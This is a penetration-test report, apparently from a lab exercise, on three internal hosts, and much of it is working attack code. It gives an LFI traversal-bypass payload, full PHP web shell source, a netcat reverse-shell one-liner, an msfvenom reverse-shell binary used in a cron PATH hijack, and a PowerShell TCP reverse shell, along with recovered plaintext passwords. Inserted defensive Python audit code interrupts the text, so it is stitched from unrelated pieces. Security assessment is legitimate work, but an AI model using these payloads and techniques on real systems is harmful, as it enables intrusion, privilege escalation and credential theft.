Humanity

The document outlines a penetration testing assessment of a corporate information system, detailing the identification of vulnerabilities across three IP addresses. Key findings include various security flaws such as Local File Inclusion (LFI), unauthorized access via SMB, and successful exploitation leading to reverse shells. Recommendations for improving security include filtering file inputs, disabling guest logins, and enhancing password complexity for sensitive files.

Uploaded by Lazy Azeri

Table of Contents

1. General Provisions ........................................................... 3
1.1 Titles of works ............................................................. 3
1.2 Goals of work ............................................................... 3
2. Collection of data about the target infrastructure and facility .............. 3
3. Search for technical vulnerabilities ......................................... 3
4. Analysis of services and carrying out attacks ................................ 4
4.1 192.168.123.112 ............................................................. 4
4.2 192.168.123.111 ............................................................ 16
4.3 192.168.123.110 ............................................................ 31
5. Recommendations ............................................................. 38
1. General Provisions

1.1 Titles of works


Name of work: penetration testing

1.2 Goals of work


The goal of the work was to obtain an objective and independent assessment of the current level of
security of the Customer’s corporate information system in relation to threats associated with
possible attacks by internal attackers.

2. Collection of data about the target infrastructure and facility

During penetration testing of the internal perimeter, the Performer investigated the following IP
addresses of the Customer:

192.168.123.112
192.168.123.111
192.168.123.110
192.168.123.100
192.168.123.101
192.168.123.102

3. Search for technical vulnerabilities

The results of collecting data from nodes containing vulnerabilities are shown in the
table below. (Table 1)

Table 1

N   IP address        Port/protocol/service   Vulnerability
1   192.168.123.112   80 (Web)                LFI
2   192.168.123.112   80 (Web)                Bypassing the file upload path
3   192.168.123.112   80 (Web)                RCE (via file upload)
4   192.168.123.111   445 (SMB)               SMB guest access
5   192.168.123.110   161 (SNMP)              Weak SNMP community string
6   192.168.123.110   21 (FTP)                FTP anonymous access

4. Analysis of services and carrying out attacks

4.1 192.168.123.112

An nmap port scan shows that the following ports are open: 22, 80, 139, 445. Running services: SSH,
SMB, web server. (Image 1)

Image 1

Opening the web server in a browser shows the following page of the website. (Image 2)

Image 2
Clicking Home opens the same page, but the URL changes: the file home.html is passed in the file
parameter (http://192.168.123.112/index.php?file=home.html) (Image 3). This may indicate an LFI
vulnerability.

Image 3

A basic LFI payload using path traversal (../../../../../../../../../../../../) did not give access to
any files. However, by bypassing the non-recursive removal of the ../ sequence, I was able to read
the /etc/passwd file, confirming the presence of the vulnerability.

payload: ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//
....//....//etc/passwd (Image 4)

Image 4
From the /etc/passwd file we learn that there are 4 users on the host:
1. root
2. kevin
3. bon
4. samantha

After determining the user names and their home directories, an attempt was made to obtain their
private keys for connecting via SSH, which should be located at /home/{username}/.ssh/id_rsa.

The private key of the user kevin was obtained (Image 5), but it was not possible to connect to the
host via SSH using it.

Image 5

A file upload form was found at /index.php?file=request.php. (Image 6)

Image 6
The file upload form allows uploading a PHP file, and it also turns out to be vulnerable to directory
traversal. If ../../../../../../../../../home/kevin/1.php is given as the file name, the resulting file is
written to /home/kevin/1.php.

As an example, a PHP file with the contents <?php echo "hello"; ?>, which prints the word hello, was
uploaded. (Image 7)
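The traversal bypass above works because the filter removes ../ in a single pass: once the inner ../ is cut out of ....//, the characters that remain are ../ again. The following Python, added here as an illustration and not code from the report or from the tested application, reproduces that single-pass filter beside the recursive removal plus path-containment check for the file parameter and the upload-name validation that recommendations 1 and 2 call for. The document root, the upload directory and the extension allow-list are assumptions.

```python
# Added example (not from the report): the non-recursive "../" removal bypass
# described above, and the recursive strip plus path-containment check and
# upload-name validation that the recommendations call for. Document root,
# upload directory and extension allow-list are assumed.
import os
import re
from typing import Optional

WEB_ROOT = "/var/www/html"       # assumed document root of index.php
UPLOAD_DIR = "/var/www/uploads"  # assumed destination of the upload form
ALLOWED_EXT = {".txt", ".png", ".jpg", ".pdf"}  # assumed upload allow-list
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")


def strip_once(path: str) -> str:
    """Single-pass removal of '../', as the vulnerable filter appears to do."""
    return path.replace("../", "")


def strip_recursive(path: str) -> str:
    """Repeat the removal until nothing is left to remove, so '....//' collapses."""
    while "../" in path:
        path = path.replace("../", "")
    return path


def vulnerable_resolve(user_file: str) -> str:
    """Mirror the flawed include logic: strip once, then join to the web root."""
    return os.path.normpath(os.path.join(WEB_ROOT, strip_once(user_file)))


def safe_resolve(user_file: str) -> Optional[str]:
    """Strip recursively, then refuse any path that resolves outside WEB_ROOT."""
    root = os.path.realpath(WEB_ROOT)
    candidate = os.path.realpath(os.path.join(root, strip_recursive(user_file)))
    # realpath follows symlinks and collapses '..', so neither an absolute
    # path nor a planted link can escape the root unnoticed.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def sanitize_upload_name(name: str) -> Optional[str]:
    """Return a safe file name for the upload form, or None to reject it."""
    # Keep only the last path component; '../' and backslash tricks are dropped.
    base = os.path.basename(name.replace("\\", "/"))
    if base in ("", ".", "..") or not SAFE_NAME.fullmatch(base):
        return None
    lowered = base.lower()
    # Reject server-side scripts outright (php, php5, phtml, phar, x.php.txt).
    if re.search(r"\.ph(p\d?|tml|ar)(\.|$)", lowered):
        return None
    if os.path.splitext(lowered)[1] not in ALLOWED_EXT:
        return None
    return base


def upload_destination(name: str) -> Optional[str]:
    """Full destination path, guaranteed to sit directly inside UPLOAD_DIR."""
    safe = sanitize_upload_name(name)
    if safe is None:
        return None
    dest = os.path.realpath(os.path.join(UPLOAD_DIR, safe))
    if os.path.dirname(dest) != os.path.realpath(UPLOAD_DIR):
        return None
    return dest


if __name__ == "__main__":
    lfi_payload = "....//" * 21 + "etc/passwd"   # shape of the report's payload
    print("single pass :", strip_once(lfi_payload))
    print("vulnerable  :", vulnerable_resolve(lfi_payload))
    print("contained   :", safe_resolve(lfi_payload))
    print("upload name :", sanitize_upload_name("../../../../../../../../../home/kevin/1.php"))
```

The containment check is what carries the weight: recursive stripping alone still lets an absolute path through, while realpath plus commonpath rejects it regardless of how the input was spelled.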

Image 7

After that, the previously uploaded PHP file was accessed through the LFI vulnerability, and the
code in it was executed successfully. (Image 8)

Image 8
As another example, a PHP file calling the phpinfo() function was uploaded. (Image 9,10)

Image 9

Image 10

To obtain a web shell, the following code was uploaded; it uses the shell_exec function to execute
system commands. (Code 1)

Code 1.

<?php
// Run the submitted command and keep its output for display below.
if (!empty($_POST['cmd'])) {
    $cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Web Shell</title>
    <style>
        * {
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
        }

        body {
            font-family: sans-serif;
            color: rgba(0, 0, 0, .75);
        }

        main {
            margin: auto;
            max-width: 850px;
        }

        pre,
        input,
        button {
            padding: 10px;
            border-radius: 5px;
            background-color: #efefef;
        }

        label {
            display: block;
        }

        input {
            width: 100%;
            background-color: #efefef;
            border: 2px solid transparent;
        }

        input:focus {
            outline: none;
            background: transparent;
            border: 2px solid #e6e6e6;
        }

        button {
            border: none;
            cursor: pointer;
            margin-left: 5px;
        }

        button:hover {
            background-color: #e6e6e6;
        }

        .form-group {
            display: -webkit-box;
            display: -ms-flexbox;
            display: flex;
            padding: 15px 0;
        }
    </style>
</head>

<body>
<main>
    <h1>Web Shell</h1>
    <h2>Execute a command</h2>

    <form method="post">
        <label for="cmd"><strong>Command</strong></label>
        <div class="form-group">
            <!-- '?? ""' avoids an undefined-index notice on the first GET request -->
            <input type="text" name="cmd" id="cmd"
                   value="<?= htmlspecialchars($_POST['cmd'] ?? '', ENT_QUOTES, 'UTF-8') ?>"
                   onfocus="this.setSelectionRange(this.value.length, this.value.length);"
                   autofocus required>
            <button type="submit">Execute</button>
        </div>
    </form>

    <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
        <h2>Output</h2>
        <?php if (isset($cmd)): ?>
            <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
        <?php else: ?>
            <pre><small>No result.</small></pre>
        <?php endif; ?>
    <?php endif; ?>
</main>
</body>
</html>

Uploading the web shell (Image 11)

Image 11

Accessing the web shell: system commands are executed successfully. (Image 12)

Image 12
Using the command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f we
get the reverse shell (Image 13)

Image 13

On our machine, we run netcat in listening mode on port 80, and we get a reverse shell. (Image 14)

Image 14

192.168.123.112 — local.txt (Image 15)

Image 15

Examining machine 192.168.123.112, I found a scheduled cron job running the command
netstat -tlpn > /root/networkadmin.txt (Image 16)

Image 16

The cron job calls netstat without an absolute path. This can be abused by generating a binary of
your own named netstat and copying it to the /dev/shm directory: because the command is not given
with an absolute path, the utility is looked up in the directories listed in the PATH environment
variable, and since /dev/shm is first in that list, netstat is launched from there.
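As an added illustration (not part of the report), the following Python audits crontab entries for exactly this condition: a job whose command is given without a path while a world-writable directory such as /dev/shm sits in the job's PATH before the real binary. The crontab text is constructed to mirror the report's finding; the system-crontab layout (five time fields, user, command) and cron's default PATH of /usr/bin:/bin are assumptions.

```python
# Added example (not from the report): audit /etc/crontab-style entries for
# the PATH-hijack condition described above. The crontab text is constructed.
import os
import stat
from dataclasses import dataclass
from typing import Callable, List, Tuple

SAMPLE_CRONTAB = """\
# constructed /etc/crontab modelled on the report's finding
SHELL=/bin/sh
PATH=/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * root netstat -tlpn > /root/networkadmin.txt
*/5 * * * * root /usr/bin/netstat -tlpn > /root/networkadmin.txt
@reboot root backup.sh
"""


@dataclass
class Finding:
    line_no: int
    user: str
    command: str
    writable_dir: str


def parse_crontab(text: str) -> List[Tuple[int, dict, str, str]]:
    """Return (line_no, env-at-that-point, user, command) for each job line.

    Assumes the system crontab layout: five time fields, then the user, then
    the command. '@reboot'-style specials take one field instead of five."""
    env: dict = {}
    jobs = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split()[0]
        if "=" in first and not line.startswith("@"):
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip('"')   # NAME=value line
            continue
        if line.startswith("@"):
            parts, user_idx = line.split(None, 2), 1
        else:
            parts, user_idx = line.split(None, 6), 5
        if len(parts) <= user_idx + 1:
            continue   # malformed or command-less line; nothing to audit
        jobs.append((line_no, dict(env), parts[user_idx], parts[user_idx + 1]))
    return jobs


def world_writable(path: str) -> bool:
    """True when 'other' has write permission on the directory (e.g. /dev/shm)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def audit_crontab(text: str,
                  is_writable: Callable[[str], bool] = world_writable,
                  is_file: Callable[[str], bool] = os.path.isfile) -> List[Finding]:
    """Flag jobs whose bare command would be found in a writable PATH directory."""
    findings = []
    for line_no, env, user, command in parse_crontab(text):
        program = command.split()[0]
        if "/" in program:
            continue   # given as a path; the shell does not consult PATH
        for directory in env.get("PATH", "/usr/bin:/bin").split(":"):
            if is_writable(directory):
                findings.append(Finding(line_no, user, command, directory))
                break
            if is_file(os.path.join(directory, program)):
                break   # genuine binary found before any writable directory
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.user} runs '{f.command}' - "
              f"{f.writable_dir} is world-writable and is searched first")
```

On a live host, pass the contents of /etc/crontab (and the files under /etc/cron.d) with the default predicates. The fix is twofold: reference the binary by absolute path in the job, and keep world-writable directories out of cron's PATH, which also removes the finding on re-audit.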

Command to generate a malicious ELF file (Image 17)


msfvenom -p linux/x64/shell_tcp LHOST={IP} LPORT={PORT} -f elf > netstat

Image 17

Copying netstat to the /dev/shm directory (Image 18)

Image 18
After some time we get a reverse shell with root privileges (Image 19)

Image 19

192.168.123.112 — proof.txt (Image 20)


Image 20

4.2 192.168.123.111

An nmap port scan shows that the following ports are open:
80, 135, 139, 445, 443, 3389. Running services: RDP, SMB, web server. (Image 21)

Image 21

Opening the web server in a browser shows the following page. (Image 22)

Image 22
By fuzzing directories, we discover a new page at the path
http://192.168.123.111/launch (Image 23)

Image 23

There is nothing interesting on this web page except one thing: a link through which we
can visit launch6. (Image 24)

Image 24
Clicking the link redirects to localhost (Image 25)

Image 25

But if we use the actual IP address of the vulnerable machine (192.168.123.111)
instead of localhost, we can reach Windows PowerShell Web Access. (Image 26)

Image 26
It was discovered that the SMB service allows guest login. There is an interesting
directory called AnneAuto (Image 27)

Image 27

In this directory, an archive called emails.zip was found, available for download.
(Image 28)

Image 28
Downloading email.zip from an SMB server. (Image 29)

Image 29

This archive is password protected. (Image 30)

Image 30
I used the zip2john utility to extract the hash from the archive, after which a brute-force
attack was run with John the Ripper, using rockyou.txt as the wordlist.

The archive password was cracked: 1chief (Image 31)

Image 31

The archive contains .msg files, which are copies of emails.
In one of them (20230922084703.msg) a letter was found containing a potential
password for the remote server: Volatic1992 (Image 32)

Image 32
Using the impacket-lookupsid utility, a list of current users on the machine
192.168.123.111 was obtained, as well as the machine name, OSCP. (Image 33)

Image 33

Using the previously collected data, we can try to connect to Windows PowerShell
Web Access (Image 34)

Image 34
I was able to connect to Windows PowerShell Web Access successfully, and it is now
possible to execute PowerShell code on the machine. (Image 35)

Image 35

Using the following PowerShell code, encoded in base64, a reverse shell was received
(Code 2) (Image 36)

Code 2.
$Text = '$client = New-Object System.Net.Sockets.TCPClient("{IP}",{PORT});$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0,
$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,
$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
Image 36

Executing shell code. (Image 37)


Image 37
Receiving the reverse shell. (Image 38)

Image 38

192.168.123.111 — local.txt (Image 39)

Image 39
At the path C:\Users\All Users\McAfee\Common Framework\SiteList.xml, a file
containing protected passwords of some users was discovered. (Image 40,41)

Image 40

Image 41
The following script was used for decryption: https://github.com/funoverip/mcafee-sitelist-pwd-decryption (Image 42)

Image 42

Decrypted password - CheeseCrackerGrapes902 (Image 43)

Image 43
This password is suitable for the Administrator user (Image 44)

Image 44

Access via RDP was obtained for the Administrator user (Image 45)

Image 45
192.168.123.111 — proof.txt (Image 46)

Image 46
4.3 192.168.123.110

Nmap scanning shows that the following ports are open: 21, 22, 161 (UDP). Running
services: FTP, SSH, SNMP (Image 47,48)

Image 47

Image 48
The FTP server allows anonymous login. The file db_connect.php was found (Image 49)

Image 49

A potential credential was found: student:secret%pass (Image 50). But these
credentials are not valid.

Image 50
Using the onesixtyone tool to enumerate SNMP community strings, the community string
security was found. (Image 51)

Image 51

Using snmpwalk, I obtained the credentials jack:Not2Easy4Win8! (Image 52)

Image 52

Using these credentials, I was able to connect to the machine via SSH. (Image 53)

Image 53
192.168.123.110 — local.txt (Image 54)

Image 54
Using the id command, we find that the user jack is in group 6 (disk). (Image 55)
Members of this group have full read and write access to the block device files, so we
can read the disks' contents or write arbitrary data to them (Image 56)
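Membership in the disk group is a root-equivalent privilege, and it is easy to miss because a user's primary group (the gid column of /etc/passwd) never appears in /etc/group's member list. The following Python, added here as an illustration and not code from the report, audits both files for non-root accounts in groups that grant such access; the group list and the sample /etc/group and /etc/passwd contents are constructed.

```python
# Added example (not from the report): audit /etc/group and /etc/passwd for
# non-root accounts holding membership in groups that grant root-equivalent
# access. 'disk' is the case from the report: members can read block devices
# directly, e.g. with debugfs. The inputs below are constructed.
from typing import Dict, List

SENSITIVE_GROUPS = {
    "disk": "raw read/write on block devices (debugfs, dd)",
    "shadow": "read password hashes in /etc/shadow",
    "sudo": "run commands as root via sudo",
    "wheel": "run commands as root via sudo/su",
    "docker": "mount the host filesystem into a privileged container",
    "lxd": "launch privileged containers",
    "adm": "read system logs",
}

SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog
disk:x:6:jack
shadow:x:42:
sudo:x:27:alice
users:x:100:jack,alice
docker:x:999:bob,jack
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
jack:x:1001:1001:Jack:/home/jack:/bin/bash
alice:x:1002:1002:Alice:/home/alice:/bin/bash
carol:x:1003:6:Carol:/home/carol:/bin/bash
"""


def audit_groups(group_text: str, passwd_text: str) -> Dict[str, List[str]]:
    """Map each sensitive group to the non-root accounts that belong to it.

    Both supplementary membership (the member list in /etc/group) and primary
    membership (the gid column in /etc/passwd) count; the latter is the one
    that 'id' shows but a glance at /etc/group does not."""
    gid_to_name: Dict[str, str] = {}
    members: Dict[str, set] = {}
    for line in group_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, member_list = line.split(":", 3)
        gid_to_name[gid] = name
        if name in SENSITIVE_GROUPS:
            members[name] = {m for m in member_list.split(",") if m}
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, _pw, _uid, gid = line.split(":", 4)[:4]
        group = gid_to_name.get(gid)
        if group in members:
            members[group].add(user)
    return {g: sorted(m - {"root"}) for g, m in members.items() if m - {"root"}}


def report(findings: Dict[str, List[str]]) -> None:
    for group, users in findings.items():
        print(f"{group}: {', '.join(users)} -> {SENSITIVE_GROUPS[group]}")


if __name__ == "__main__":
    report(audit_groups(SAMPLE_GROUP, SAMPLE_PASSWD))
```

In the sample, carol is caught only through her primary gid. Removing a supplementary membership is gpasswd -d jack disk; a primary group is changed with usermod -g. Any service that genuinely needs raw device access should get a dedicated account rather than an interactive user's membership.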

Image 55

Image 56
Using debugfs on the block device, we can read the filesystem directly, navigate to the root
user's home directory and read his private SSH key. (Image 57)

Image 57
Using this private SSH key, we can log in to the system via SSH as the root user.
(Image 58)

Image 58

192.168.123.110 — proof.txt (Image 59)

Image 59
5. Recommendations

1. Filter the data passed in the file parameter (http://192.168.123.112/index.php?file=home.html),
removing ../ sequences recursively.

2. Filter the file name in the upload form at http://192.168.123.112/index.php?file=request.php,
removing ../ sequences from the file name recursively. Prohibit uploading PHP files.

3. Deny guest login to the SMB server at 192.168.123.111:445

4. Change the password for the email.zip archive located on the SMB server at
192.168.123.111:445 to a more complex one.

5. Change the community string for snmp at 192.168.123.110

6. Deny anonymous login via FTP at 192.168.123.110
